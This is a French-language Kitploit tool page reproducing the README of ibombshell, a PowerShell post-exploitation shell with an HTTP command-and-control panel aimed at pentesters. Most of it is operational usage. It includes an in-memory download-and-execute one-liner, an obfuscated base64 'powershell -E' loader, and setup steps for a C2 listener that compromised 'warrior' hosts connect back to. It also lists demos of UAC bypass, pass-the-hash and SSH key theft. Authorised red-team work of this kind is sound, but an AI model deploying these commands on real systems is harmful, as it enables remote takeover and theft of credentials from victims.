Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ibombshell — Outil pour déployer une invite de post-exploitation à tout moment | Kitploit
Outils/GitHubGitHub/telefonica/ibombshell
Escalade de PrivilègesGénération de PayloadsÉvasion IDS/IPSPost-ExploitationTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à Distance
GitHubtelefonica/ibombshell

ibombshell

Outil pour déployer une invite de post-exploitation à tout moment

Voir le dépôt
3217114il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Supported Python versions License

ibombshell - Shell distante dynamique

      ,--.!,    _ ____                  __   _____ __         ____
   __/   -*-   (_) __ )____  ____ ___  / /_ / ___// /_  ___  / / /
 ,d08b.  '|`  / / __  / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
 0088MM      / / /_/ / /_/ / / / / / / /_/ /__/ / / / /  __/ / /
 `9MMP'     /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/

 [+] Démarrage de la console...
 [*] Console prête !

ibombshell est un outil écrit en Powershell qui vous permet d'avoir une invite à tout moment avec des fonctionnalités de post-exploitation (et dans certains cas d'exploitation). C'est un shell qui est téléchargé directement en mémoire offrant l'accès à un grand nombre de fonctionnalités de pentesting. Ces fonctionnalités peuvent être téléchargées directement en mémoire, sous la forme d'une fonction Powershell. Cette forme d'exécution est connue sous le nom d'everywhere.

De plus, ibombshell propose un deuxième mode d'exécution appelé Silently, permettant au pentester d'exécuter une instance d'ibombshell (appelée warrior). L'ordinateur compromis sera connecté à un panneau C2 via HTTP. Il sera donc possible de contrôler le warrior et de charger des fonctions en mémoire qui aident le pentester. Cela se produit dans la phase de post-exploitation.

Prérequis

Pour exécuter ibombshell everywhere, il est obligatoire d'avoir PowerShell 3.0 ou supérieur. Pour les systèmes d'exploitation autres que Windows, vous pouvez en savoir plus sur PowerShell GitHub - PowerShell pour chaque système !.

Pour exécuter le mode silencieux d'ibombshell, vous avez besoin de python 3.6 et de certaines bibliothèques python. Vous pouvez les installer avec :

cd ibombshell\ c2/
pip install -r requirements.txt

Remarque : ibombshell C2 fonctionne en python 3.X. Assurez-vous d'exécuter un pip correspondant à cette version.

Utilisation

ibombshell a deux modes d'exécution :

ibombshell everywhere

Pour charger ibombshell, exécutez simplement dans PowerShell :

iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

Vous pouvez maintenant exécuter la console ibombshell téléchargée en exécutant :

console

ibombshell everywhere dans les environnements isolés

Si vous devez utiliser ibombshell dans des environnements isolés, vous devez d'abord préparer votre ordinateur dans un environnement réseau. Chargez toutes les fonctions dont vous aurez besoin et utilisez savefunctions pour les enregistrer dans le registre Windows.

Vous pouvez maintenant utiliser ce code base 64 pour obtenir ibombshell :

powershell.exe -E "JABwAGEAdABoACAAPQAgACcAaABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAYwBsAGEAcwBzAGUAcwBcAGkAYgBvAG0AYgBzAGgAZQBsAGwAXABjAG8AbgBzAG8AbABlACcAOwAgAHQAcgB5ACAAewAJAGkAZgAoAHQAZQ
BzAHQALQBwAGEAdABoACAAJABwAGEAdABoACkAIAB7ACAAJABjAG8AbgBzAG8AbABlACAAPQAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAcABhAHQAaAApAC4ATgBhAG0AZQA7ACAAYwBkACAAaABrAGMAdQA6
ADsAIAAkAG4AYQBtAGUAIAA9ACAAJABjAG8AbgBzAG8AbABlAC4AcwBwAGwAaQB0ACgAIgBcACIAKQBbAC0AMQBdADsAIAAkAGMAbwBkAGUAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABjAG
8AbgBzAG8AbABlACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAUAByAG8AcABlAHIAdAB5ACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUA
YwB0ACAAewBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcABzAG8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABAAHsAIgBwAHIAbwBwAGUAcgB0AHkAIgA9ACQAXwA7ACAAIgBWAGEAbAB1AGUAIgAgAD0AIAAoAEcAZQ
B0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAYwBvAG4AcwBvAGwAZQAiACAALQBOAGEAbQBlACAAJABfACkALgAkAF8AfQB9ACkALgBWAGEAbAB1AGUAOwAgACQAYwBvAGQAZQAgAHwAIABv
AHUAdAAtAHMAdAByAGkAbgBnACAAfAAgAGkAZQB4ADsAIABjADoAOwAgAGMAbwBuAHMAbwBsAGUAOwB9AH0AYwBhAHQAYwBoAHsAdwByAGkAdABlAC0AaABvAHMAdAAgACQARQByAHIAbwByAFsAMABdAH0A"

ibombshell mode silencieux

Cette version vous permet d'exécuter la console ibombshell et de la contrôler à distance depuis le panneau C2 créé en python. Pour exécuter cette version, vous devez d'abord lancer le processus console dans powershell :

iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

Dans le chemin ibombshell C2, préparez le C2 :

python3 ibombshell.py

Et créez le listener où les warriors se connecteront :

iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run

Le port par défaut du listener est 8080. Enfin, vous pouvez lancer la console en mode silencieux sur l'hôte pour obtenir un contrôle à distance :

console -Silently -uriConsole http://[ip or domain]:[port]

Schéma ibombshell C2

Le fonctionnement de base du panneau de contrôle ibombshell suit le schéma suivant :

        ibombshell                 C2
            |                      |
            |    newibombshell     |
            +--------------------->| --+ register
            |                      |<--+ from IP
            |    get functions     |
            |   and instructions   |
            +--------------------->|
            |                      |
            |    send functions    |
            |   and instructions   |
execute +-- |<---------------------+
        +-->|                      |
            |       results        |
            +--------------------->|
            |                      |

Docker

Nous avons créé un conteneur docker avec tout ce dont vous avez besoin pour le faire fonctionner. Exécutez cette commande depuis l'emplacement du Dockerfile.

sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell

Vidéos d'exemple

Quelques vidéos d'exemple...

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: macOS

iBombShell: PoC de uso desde macOS

ibombshell: Extracting Private SSH Keys on Windows 10

ibombshell: Módulo para extracción de claves privadas SSH en Windows 10

iBombShell: PoC savefunctions

iBombShell: PoC savefunctions

ibombshell - Silently bypass UAC Environment Injection

ibombshell - Modo silencioso para el bypass UAC Environment Injection

iBombShell - Mocking Trusted Directory

iBombShell - Mocking Trusted Directory

iBombShell - DLL generation

iBombShell - DLL Generation

Télécharger l’outil